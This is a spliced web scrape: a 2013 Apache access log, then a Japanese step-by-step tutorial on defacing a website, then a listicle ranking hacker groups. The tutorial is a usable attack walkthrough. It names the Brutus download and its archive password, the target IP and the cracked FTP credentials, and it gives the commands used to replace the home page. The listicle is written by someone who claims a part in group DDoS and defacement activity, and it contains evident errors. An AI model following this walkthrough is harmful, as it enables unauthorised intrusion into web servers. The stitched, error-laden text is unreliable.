116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-scrollspy.js HTTP/1.1” 200 4610
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/bootstrap/css/bootstrap.min.css HTTP/1.1” 200 103314
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-alert.js HTTP/1.1” 200 2524
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-carousel.js HTTP/1.1” 200 5320
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-modal.js HTTP/1.1” 200 6579
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-transition.js HTTP/1.1” 200 1756
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-typeahead.js HTTP/1.1” 200 7985
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-dropdown.js HTTP/1.1” 200 4236
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-tooltip.js HTTP/1.1” 200 7921
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-button.js HTTP/1.1” 200 2841
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-popover.js HTTP/1.1” 200 3147
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-affix.js HTTP/1.1” 200 3483
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/google-code-prettify/prettify.css HTTP/1.1” 200 2066
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-collapse.js HTTP/1.1” 200 4618
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/bootstrap/assets/js/jquery.js HTTP/1.1” 200 92791
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-tab.js HTTP/1.1” 200 3496
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/jquery.socialbutton-1.9.0.js HTTP/1.1” 200 23494
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-typeahead.js HTTP/1.1” 200 7985
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-affix.js HTTP/1.1” 200 3483
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/google-code-prettify/prettify.js HTTP/1.1” 200 13632
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /favicon.ico HTTP/1.1” 200 41246
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/bootstrap/img/glyphicons-halflings.png HTTP/1.1” 200 12799
116.94.220.46 – – [13/Feb/2013:02:15:24 +0900] “GET /hack/js/google-code-prettify/prettify.js HTTP/1.1” 200 13632
116.94.220.46 – – [13/Feb/2013:02:15:25 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-popover.js HTTP/1.1” 200 3147
116.94.220.46 – – [13/Feb/2013:02:15:25 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-collapse.js HTTP/1.1” 200 4618
116.94.220.46 – – [13/Feb/2013:02:15:25 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-alert.js HTTP/1.1” 200 2524
116.94.220.46 – – [13/Feb/2013:02:15:25 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-dropdown.js HTTP/1.1” 200 4236
116.94.220.46 – – [13/Feb/2013:02:15:25 +0900] “GET /hack/css/font-awesome.css HTTP/1.1” 200 21596
116.94.220.46 – – [13/Feb/2013:02:15:25 +0900] “GET /hack/css/font-awesome-ie7.min.css HTTP/1.1” 200 25255
116.94.220.46 – – [13/Feb/2013:02:15:25 +0900] “GET /hack/js/jquery.socialbutton-1.9.0.js HTTP/1.1” 200 23494
116.94.220.46 – – [13/Feb/2013:02:15:25 +0900] “GET /hack/font/fontawesome-webfont.eot? HTTP/1.1” 200 25395
116.94.220.46 – – [13/Feb/2013:02:15:26 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 200 29380
121.108.50.78 – – [13/Feb/2013:02:15:27 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
119.240.206.111 – – [13/Feb/2013:02:15:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
107.22.18.158 – – [13/Feb/2013:02:15:54 +0900] “HEAD /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 –
107.22.18.158 – – [13/Feb/2013:02:15:56 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22759
58.1.238.166 – – [13/Feb/2013:02:16:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:16:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:16:27 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 500 –
119.240.206.111 – – [13/Feb/2013:02:16:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 500 –
173.199.119.35 – – [13/Feb/2013:02:16:57 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 500 –
58.1.238.166 – – [13/Feb/2013:02:17:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 500 –
180.43.43.180 – – [13/Feb/2013:02:17:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 500 –
150.70.75.164 – – [13/Feb/2013:02:17:11 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-tooltip.js HTTP/1.0” 200 7921
150.70.75.164 – – [13/Feb/2013:02:17:11 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-popover.js HTTP/1.0” 200 3147
150.70.75.164 – – [13/Feb/2013:02:17:13 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-button.js HTTP/1.0” 200 2841
150.70.75.164 – – [13/Feb/2013:02:17:13 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-transition.js HTTP/1.0” 200 1756
150.70.75.164 – – [13/Feb/2013:02:17:13 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-affix.js HTTP/1.0” 200 3483
150.70.75.164 – – [13/Feb/2013:02:17:13 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-collapse.js HTTP/1.0” 200 4618
150.70.172.235 – – [13/Feb/2013:02:17:13 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-dropdown.js HTTP/1.0” 200 4236
150.70.75.164 – – [13/Feb/2013:02:17:13 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-scrollspy.js HTTP/1.0” 200 4610
150.70.172.235 – – [13/Feb/2013:02:17:14 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-typeahead.js HTTP/1.0” 200 7985
150.70.172.240 – – [13/Feb/2013:02:17:20 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-tab.js HTTP/1.0” 200 3496
150.70.172.240 – – [13/Feb/2013:02:17:20 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-carousel.js HTTP/1.0” 200 5320
150.70.172.240 – – [13/Feb/2013:02:17:20 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-modal.js HTTP/1.0” 200 6579
150.70.172.240 – – [13/Feb/2013:02:17:20 +0900] “GET /hack/js/bootstrap/assets/js/jquery.js HTTP/1.0” 200 92791
150.70.172.240 – – [13/Feb/2013:02:17:20 +0900] “GET /hack/js/ajax.js HTTP/1.0” 200 6398
121.108.50.78 – – [13/Feb/2013:02:17:27 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 500 –
150.70.75.164 – – [13/Feb/2013:02:17:28 +0900] “GET /hack/js/google-code-prettify/prettify.js HTTP/1.0” 200 13632
150.70.75.164 – – [13/Feb/2013:02:17:28 +0900] “GET /hack/font/fontawesome-webfont.eot? HTTP/1.0” 200 25395
150.70.75.164 – – [13/Feb/2013:02:17:29 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-alert.js HTTP/1.0” 200 2524
150.70.75.164 – – [13/Feb/2013:02:17:29 +0900] “GET /hack/js/jquery.socialbutton-1.9.0.js HTTP/1.0” 200 23494
121.108.50.78 – – [13/Feb/2013:02:17:40 +0900] “POST /hack/take21.php HTTP/1.1” 500 –
121.108.50.78 – – [13/Feb/2013:02:17:41 +0900] “GET /favicon.ico HTTP/1.1” 200 41246
119.240.206.111 – – [13/Feb/2013:02:17:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 500 –
93.182.129.86 – – [13/Feb/2013:02:18:04 +0900] “GET /hack/ HTTP/1.1” 500 –
58.1.238.166 – – [13/Feb/2013:02:18:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 500 –
180.43.43.180 – – [13/Feb/2013:02:18:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 500 –
93.182.129.86 – – [13/Feb/2013:02:18:14 +0900] “GET /favicon.ico HTTP/1.1” 200 41246
93.182.129.86 – – [13/Feb/2013:02:18:19 +0900] “GET / HTTP/1.1” 200 12691
121.108.50.78 – – [13/Feb/2013:02:18:27 +0900] “POST /hack/take21.php HTTP/1.1” 500 –

ホームページ改ざん方法(ブルートフォースアタック・総当たり攻撃使用編)

ブルートフォースアタックを使用してFTPのIDとパスワード取得してホームページのトップページを改ざんする方法

対象となるサイトは当校が用意したデモ用のショッピングサイト
http://www.ebaburashopping.jpburuburu001

改ざんするホームページを確認いただきましたら、
次にFTPのIDとパスワードを解析するソフトをダウンロードします。

ソフトのダウンロード先は、
http://www.whitehackerz.jp/tools/brutus.exe
となります。buruburu003
ブラウザを立ち上げてソフトをダウンロードしてください。

ソフトを解凍する際、パスワードを聞いてきますので、パスワードを
whitehackerz#99
と入力してください。
デスクトップ上に解凍されます。

『brutus』というフォルダが作られていますので、クリックしてフォルダを開きます。

「BrutusA2.exe」をダブルクリックしてソフトを起動します。buruburu006

次に各種設定を行います。

まずは接続するサーバーのIPアドレスを調べます。
左下のWindowsアイコンをクリックし、すべてのプログラムの中にあるアクセサリの中の「コマンドプロンプト」クリックして起動します。
ちなみにキーボードの
Windowsマークを押しながらRボタンを押し、名前の箇所にcmdと入力しても起動できます。

次にエバブラショッピングサイトのIPアドレスを調査します。
ここでは、pig(ピング)コマンドを使います。

コマンドプロンプトに
ping(スペース)ebaburashopping.jp
と入力し、Enterキーを押します。
そこに表示されているIPアドレスを控えてください。buruburu005

次に「BrutusA2」のソフトに戻り、Targetの箇所に先程控えておいたIPアドレスを入力します
IPアドレスは
219.117.206.14
です。

次にTypeからFTPを選択します。
その他の設定は変更しません。

ではStartボタンをクリックして解析を開始しましょう。buruburu007

解析が完了して、FTPのIDとパスワードが見つかると、ここに表示されます。
では実際に、解析したIDとパスワードを使い、FTP接続できるか確認してみましょう。buruburu008

先程、立ち上げたコマンドプロンプトに戻り、
ftp
と入力しEnterキーを押します。
openと入力し、スペースを一つ空け、IPアドレスを入力してEnterキーを押します。

IPアドレスは
219.117.206.14
です。

次にユーザー名を聞いてきますので、ユーザー名を入力し、Enterキーを押します。
ユーザー名は、
ftpuser
です。

次にパスワードを聞いてきますので、パスワードを入力し、Enterキーを押します。
パスワードは、
1234
です。
IDとパスワードが正しければ、
Login successful
と表示され、接続成功です。

サーバーに繋がりましたので、ファイルのリストを表示してみましょう。

コマンドプロンプトに
ls(エルエス)
と入力しEnterキーを押してください。
リストが表示されました。

それでは、トップページをウェブサーバーから取得しましょう。
その前にファイルを取得し保存するための専用フォルダをCドライブの直下に「web」という名前で作成しておきましょう。

次にコマンドプロンプトに戻り、get(ゲット)コマンドを使い、インデックスファイルを取得します。その際、phpファイルをhtmlにリネームし、取得します。

ファイルが実際にダウンロードされたか確認します。

メモ帳を開き、落としたファイルを開いて、編集します。
メモ帳を開いたらファイルから「開く」で、先程のファイルを開いて一旦中身を全部消去します。

次に、文章をこのように入力します。

<h1>WEB改ざん成功!!!</h1>

上書き保存をしてメモ帳を閉じます。

次にコマンドプロンプトに戻り、put(プット)コマンドを使ってファイルをアップしましょう。

これでファイルがアップされました。以上でトップページが入れ替わります。
アクセスして確認しましょう。
確認したらdel(デル)コマンドを使ってファイルを削除し、元に戻しましょう。

全世界のハッカー組織20集団まとめ保存版

いよいよ我々は未だかつてない規模のハッカー集団の解明に成功しました。

そこで今回は、世界のハッカー組織20全まとめ保存版

として公開します。これまで、闇に包まれていたそのベールを脱ぐ時です。

また、今回2週間に及ぶ取材にご協力頂いたのは、Silence 404 氏です。 忙しい中彼もまた取材に明け暮れて頂き記事をまとめてくれました!この場をお借りして熱く御礼申し上げます。

さてそれでは紹介に移りたいと思いますが、少し見方の説明を。各地域ごとに分けて紹介しており、最後に世界で活躍している組織をまとめております。また、それぞれのハッカー組織には独断と偏見とこれまでの実績から★マークにて強さを表しております。

尚、紹介にあたりましては、情報の正確性には十分気を使っているつもりですが、万が一、誤りなどございましたら、大変お手数ですが、info@whitehackerz.jpまでお知らせください。

また追加の要望等もありましたらご連絡お待ちしています。

それでは紹介していきます。

北アメリカ

UG Nazi
hitler-cartoon-character-4
強さ★5つ
本拠地 アメリカ・ニューヨーク
Twitter : @UG
公式サイト : FBIによって消去された。
本拠地はアメリカのニューヨークにあるとされている。
活動開始は2011年ではないかと考えられる(それ以前にもあるかも)アノニマス交流があるがチーム自体はアノニマスではないと主張している。最近でもサイトの改ざんを行っている。
ロゴマークはナチスのアドルフ・ヒトラーを可愛くしたロゴである。
南アメリカなどに支部を置いており日本にはない。
過去に私もUG Naziのメンバーに”中国人”と言われ喧嘩になりそうになった時があったが喧嘩にならずに済んだ。
使用OSは主にLinuxである。かなり挑発が好きで改ざんしたサイトに #F*ckFBI #F*ckCIA #F*uckPolice #UGNaziと記入している
メンバーさんと絡んだりするのは良いですがたまにブラックジョークとかを言うのでキレないように気お付けてください。戦争になるとものすごく危ないです。

Cult of the Dead Cow
url
強さ★7つ
本拠地 アメリカ・ニューヨーク
Twitter : https://twitter.com/Demonseed_Elite
サイト : http://w3.cultdeadcow.com/cms/
1984年に設立メンバー数は20人だと言われておりメンバーのなかには大学研究者、地方知事補、教授、など色んな人がいる
彼らは他のハッカーたちから恐れらており5年に1人というペースでメンバーの加入を認めていない
cDcは12グループをまとめており世界1のハッカーグループである
サイエントロジーにも攻撃を行っており Back orifice も開発した
中国、イランのネット検閲反対する連合に加入した。

南アメリカ

D4rk Sh3ll Teamd4rksh3ll
強さ★5つ
本拠地 南アメリカ?ヨーロッパ?
Twitter : @D4rkSh3ll
公式サイト : http://www.d4rksh3ll.tk
平均年齢18.9歳の #Deface チーム
Antisec関連のチームである
XSSやSQL Injectionの脆弱性を使用し世界中のサイトを改ざんしているチーム
私がリーダーの[?] W4r10ck423 [?]氏に”なぜ?書き換えを行っているの?”と
質問したところ”ただ楽しいから改ざんしてるよ”という返事が返ってきた。
メンバーはすごく若く最年少のメンバーは15歳である。
彼らは個人サイトを持っており shell や ハッキングツールを配布している
若いからと言って甘くみてはいけない。

Team Hacker Argrntino
b132975be26c80024a46914a504c1231
強さ★5つ
本拠地:南アメリカ
Twitter : @HackerArgenino
公式サイト : http://liberoinfo.com.ar
#Antisec 系統のチームで日本への攻撃も行っていた。
最近は OpIsraelにも参加し有名になった
イスラエルのウェブサイトを数多く改ざんした。
活動が多くブラジルやルーマニアなどの国も攻撃を仕掛けている
XSSやDDosもやっておりアノニマス内でも人気があるチーム。
リーダーは @LiberoAmericaMu だと思われる。
以前はただサイトを書き換えるだけのチームだった。

Sector404
b1842d2be198853ac78649c082fff794
強さ ★5つ
本拠地 南アメリカ 、イタリア、スペイン など
公式Twitter : Sector_404
サイト : 非公開
アノニマスの小グループ。#Antisec , #FreeSec 系統のチーム
以前は単独で活動を行っていたがメンバーが少ない、ロゴ(別のロゴ)がアノニマスと似ているということで参加したと思われる
SQL Injection を使う #Deaface チーム
ホームページの書き換えを大量に行っている。
現在各国に支部がある。日本支部は私が管理している。(Sector404に関するニュースを英語,スペイン語,日本語でお知らせしています。)
使用OSは Linux と Win を使用しているらしい。
オペレーションを開いて活動している。
DDos攻撃やXSS攻撃も行っており主な攻撃サイトはヨーロッパやアメリカあたりである。
もしも何かあれば日本もターゲットになる可能性もあるかもしれない。
普段は使っている言語はスペイン語
現在私は,Sector404のメンバー @Shadow404 様の後継者になっている
巨大なグループである

ヨーロッパ

CCC
%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB25C3_Pesth%C3%B6rnchen
強さ ★7つ
本拠地 ドイツ・ベルリン
Twitter : https://twitter.com/chaosupdates
サイト : http://www.ccc.de/?language=en
ドイツのホワイトハッカー集団
構成員は3000人以上
巨大なハッカー集団である
設立は世界最強のCDCよりも3年早い1981年
自由のインターネットを守ることを目的にしている
CCCはあるゆる銀行のネットワークに侵入しon-lineアカウントID・パスワードなどをダウンロード
現金を得ることに成功その翌日銀行の現金を返却した。
政治トーク中心のカオスラジオも発信している。

ロシア

RBN
強さ★6つ
本拠地 ロシア・サンクトペテルブルク
ウェブホスティング業者である。本当のところはハッカーチームでマルウェアやスパムメール、児童ポルノ、フィッシング詐欺などを生業するハッカーに防弾ホスティングを提供
かつてRBNは公式サイトを持っており合法なホスティング業者であったが2007年突然姿を消した。
2009年から2010年にかけて大流行したStormワーム、Mpackの作者であるとも言われている
リーダーはFlyman
以下の複数ネットワークがRBNの一部と噂されている
SBT Telecom Network
Aki mon Telecom
Rusouvenirs Ltd
Too Coin Software Limited
First Connect Telecom Limited Inc
Nevacon

西アジア

RedHack
b5a30d507154c16bb593c3f231c1c5b7
強さ★5つ
本拠地 トルコ
Twitter : @TheRedHack
公式サイト : http://RedHackLeaks.blogspot.com
Zone-H : http://www.zone-h.org/archive/notifier=RedHack
アノニマス系統の小グループ
アノニマス誕生前の1997年から活動をしており社会主義の実現を目的とした過激なチーム
攻撃場所はトルコ国内やドイツ,アメリカ,イタリアなど
去年トルコ保健省のfacebookを乗っ取り政府関係のサイトをサポーターと一緒にDDos攻撃した。
私も一時期サポーターとして参加していた。
サポーターが数多くいる。アノニマスに参加してからメンバーは測定不可能となった。
改ざんやDDos攻撃などを大量に行っている
アノニマスとは違いリーダー制を導入しているため
公式メンバーにはなれないただしサポーターになることができる。
ある程度技術的な知識がないと参加できない。

東アジア

中国紅客連盟
強さ ★6つ
本拠地 中国
Twitter 無し
サイト http://www.cn-hack.cn/
中国のハッカー連合
中国政府と関係があると思われている
2010年9月に尖閣諸島中国漁船衝突事件が起き、同組織が満州事変の発端となった柳条湖事件から79年目にあたる、9月18日まで日本政府機関などのウェブサイトを攻撃する計画を表明していた。
また、9月16日夜から17日の未明まで警察庁のサイトが全く繋がらなかったり、違うページへの切り替えが遅くなったりする状態が続き、大量のデータを標的に送りつけて機能をマヒさせる攻撃を受けた可能性がある。
しかし同組織が攻撃した疑惑はあるが、真相は不明である。

中国匿名者
強さ ★3つ
本拠地 台湾?中国?
Twitter : @AnonOpsCN
サイト :リンク切れ
中国のアノニマスの一部正式な名前は 中国匿名者 (AnonOpsChina)
DDos攻撃ツール HOIC と LOIC を使い国内のサイトを攻撃する
中国海賊党を支持し活動を行っている
Twitterでの発言は10月で止まっており活発的な活動は見ることはできなかった。
今後戻ってくる可能性が高いので期待できる。絡んだことはないのであまり交流はできなかった

Anonymous CuzSec
ce3eb0440fe0160a6128c9a683aa8343
強さ★4つ
本拠地 韓国
Twitter @AnonymousCuzSec
公式サイト 所持しておらず
韓国のAntisec系統ハッカーチーム
使用OSはLinuxとIPhone
DDos攻撃に参加したりする。
攻撃型アノニマスで使用ツールは Mobile LOIC
他の韓国のアノニマスと連携しておりスプラッター映画が大好きらしい。
過去に2chの攻撃に参加したと思われるが実際のところは不明である。
話を聞いたところ韓国国内でオペレーションを立てる予定は今のところない
今後どのオペレーションに参加するか楽しみである。
Hack Me が大の得意

Anonymous中国
imgres
強さ ★4つ
本拠地 中国
Twitter @AnonymousChina
公式サイト 所持しておらず
中国に拠点を置くアノニマス
中国語発言をしておらず民主主義と自由主義を目指すアノニマスの一部
去年中国政府関係のサイト改ざんしサイト訪問者にTorを配布した。
Twitterには来ているようだが発言は6月で止まっている。
サイトを改ざんする3か月前に私と一部のメンバーをIRCに誘ってくれた。
とても優しいアノニマスである。
以外にAnonOpsChinaよりハッキングができる。
アノニマスのなかでも重要なアノニマスの一部だと思います。
現在はIRCもTwitterも停止
おそらく別の掲示板を使用して活動していると思われる。
今後の民主化活動に期待している。

 

Hmei7
f840f85f1f9831a1f80731b5d195832e
強さ ★2つ
本拠地 インドネシア
Twitter : @officalHmei7
サイト : それらしきサイトは見つかったが違う可能性が高いため載せないことにした。
Zone-H : http://www.zone-h.org/archive/notifier=Hmei7
インドネシアのハッカーグループ主にSQLの脆弱性を利用し,サイトを改ざんする #Deface チーム
2008年に活動が開始され現在に至る。アノニマス?と聞いたところ違うと述べている
アーカイブを見てみると毎日のようにハッキングをしており1日で最低3サイトは改ざんする
Antisecと交流があるが上記で述べた通りアノニマスではない
Zone-H のアーカイブを見てみると主に使用しているOSはWin2003とLinuxだ。
日本,オランダ,イギリス,イタリア,ベトナム,アメリカなどのサイトを書き換えた。
最近のHmei7の改ざんはとてもシンプルな改ざんでミラーにアクセスすると”Hacked By Hmei7″と書かれた文字だけというだけである。
Webdav Shell Maker という Windows でサイトを改ざんするツールも開発している。
大量に各国のサイトを改ざんするのでかなり有名である。ご存じの方もいらっしゃるのでないでしょうか?
Hmei7 からこのサイトを見ている人にメッセージ
あきらめないで簡単なプログラムを使わないでほしい。
PythonかPelを勉強してね ( ^ ^ )

TEAM T!g3R
強さ ★3つ
本拠地 不明 アジアの何処か
Twitter 無し
サイト 無し

www.rgd.gov.lk のデータベースのユーザー名、パスワードをpstebin.comに公開したチーム
いろいろと探したが詳しい情報は見つからなかった

世界中もしくは不明

Wikileaks
%E3%83%95%E3%82%A1%E3%82%A4%E3%83%ABWikileaks_logo
強さ ★5つ
本拠地 不明
Twitter ; @Wikileakas
サイト : wikileaks.org
宗教、政府、企業などを公開するWiki
創始者はジュリアン・アサンジ
匿名の投稿を維持している
日本のコーナーはちなみにACTAについての事だらけです。
2006年に準備が開始され
1年内に120万件も超える機密文書がデータベース化している
現在、中国の反政府主義者、台湾、欧米、オーストラリア、南アフリカジャーナリスト、数学者、ベンチャー企業にによって運営されている

Crytome
cryptome-01
強さ ★6つ
本拠地不明
サイト http://www.ccc.de/?language=en
Wikileaksよりも詳しくびっくりするようなサイト
一部の過激な写真などがUPされいますのでいやな方はアクセスしないでください。
アングラサイトでアングラにいるハッカーたちも利用しているサイト
以前に原発事故時の空港写真や内部構造を公開し話題となった。
その他にもプーチン大統領を批判したバンドの詳細や
中国のインターネット関係の書類などを公開している

D34dCrew
logo
強さ ★3つ
本拠地 日本、アメリカ、マレーシア付近?
Twitter : @D34dCrew アメリカ支部: @D34dCrew_En
公式サイト : http://www.d34dcrew.tk
近日結成されたばかりの #Antisec 系統のチーム
日本人もメンバーにいる。
主にXSSを好むチームである。
一部のメンバーは Deface や フィッシング などをしている
技術があれば誰でも参加できる
Projectごとにリーダーが変わるという少し変わったチームで普段は活動していない。
色んなチームと交流関係を持っておりこれから大きくなりそうな予感
チームの平均年齢は17.4歳
アメリカ人のAntisecメンバーが近日 D34dCrewアメリカ支部 を設立する予定である。

Ghost Shell
2823d553894c54e9cb54ad0e62fd5135
強さ ★4つ
本拠地 不明
Twitter: @TeamGhostShell
サイト : 無し
アノニマス関連だという噂が回っているが真相は分からない
世界の有名大学のサーバーをハッキングし個人情報を流出させた
職員もしくは学生のメールアドレスが流出した可能性がある
流出されたと思われる日本の大学は、東京大学、京都大学、大阪大学、東北大、名古屋大学が挙がっている
ゴーストシェルがネット上に現れたのは5月ごろだという
Projectが沢山行われるようになり最近ロシアを攻撃した

NinjaSec
c90ff04e6feb4d3fec83746f2fae3944
強さ ★2つ半
本拠地 日本? , イギリス?
Twitter 消滅?
公式サイト 所持しておらず。
XSSの脆弱性を大量に見つけるチーム
私が確認できたメンバーは2人である。
とにかく謎が多いチーム
確認されたチームの2人は恋人と思われるが本当かどうかは分からない
シッピングサイト、政府関連のサイト、法人サイトなどいろいろなサイトをXSSしている
Anonymissのメンバーも参加しており親日過ぎて最近日本語と書道を勉強しだしたらしい
今後どんな活動をするのか分からないが個人的にはお気に入りのチームである。

Shm00p
5a9e1dd7c96a41d2d311e38a7305b34b
強さ ★3つ
本拠地 不明 ドイツ?
Twitter : @Shm00pUG
サイト : 不明
UGNazi 系統のと仲がいいと思われるチーム。
アノニマスではなく反アノニマスチームである。
以前にアノニマス系統のチームと戦争をしたが結果はどうなったのかいまだに知られていない
ロゴは恐竜と銃とワイングラスそして上のにはナチの紋章がある。
思想的にはファシズムである。
関連組織にNaziSecなどがある。
今後どんな活動をしているのか見てみたいグループだ。